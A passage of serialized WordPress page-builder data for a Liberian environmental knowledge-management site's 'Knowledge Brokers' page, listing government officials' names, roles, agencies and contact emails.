id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br 